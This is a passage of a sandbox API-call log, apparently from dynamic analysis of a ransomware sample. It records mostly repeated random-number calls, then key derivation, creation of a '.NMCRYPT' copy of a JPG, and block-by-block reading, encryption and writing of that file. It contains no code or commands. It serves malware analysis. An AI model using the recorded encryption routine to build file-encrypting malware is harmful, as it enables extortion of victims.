| out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.589] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0162.589] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0162.589] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0162.589] CryptHashData (hHash=0x9ad678, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.589] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad378) returned 1 [0162.589] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0162.590] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0162.590] wcslen (_String="\\\\?\\") returned 0x4 [0162.590] CryptDuplicateKey (in: hKey=0x9ad378, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad138) returned 1 [0162.590] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0162.590] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0162.590] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2575) returned 1 [0162.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0162.591] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.592] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.592] GetLastError () returned 0x0 [0162.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.931] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.931] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.931] GetLastError () returned 0x0 [0162.931] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.931] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.931] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.931] GetLastError () returned 0x0 [0162.931] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.931] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.931] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.931] GetLastError () returned 0x0 [0162.931] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.931] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.932] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.932] GetLastError () returned 0x0 [0162.932] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.932] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.932] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.932] GetLastError () returned 0x0 [0162.932] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.932] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.932] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.932] GetLastError () returned 0x0 [0162.932] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.932] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.932] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.932] GetLastError () returned 0x0 [0162.932] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.932] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.932] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.932] GetLastError () returned 0x0 [0162.932] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.932] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.932] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.932] GetLastError () returned 0x0 [0162.932] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.932] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0xf, lpOverlapped=0x0) returned 1 [0162.932] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xf, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x10) returned 1 [0162.933] GetLastError () returned 0x0 [0162.933] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x10, lpOverlapped=0x0) returned 1 [0162.933] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0162.933] WriteFile (in: 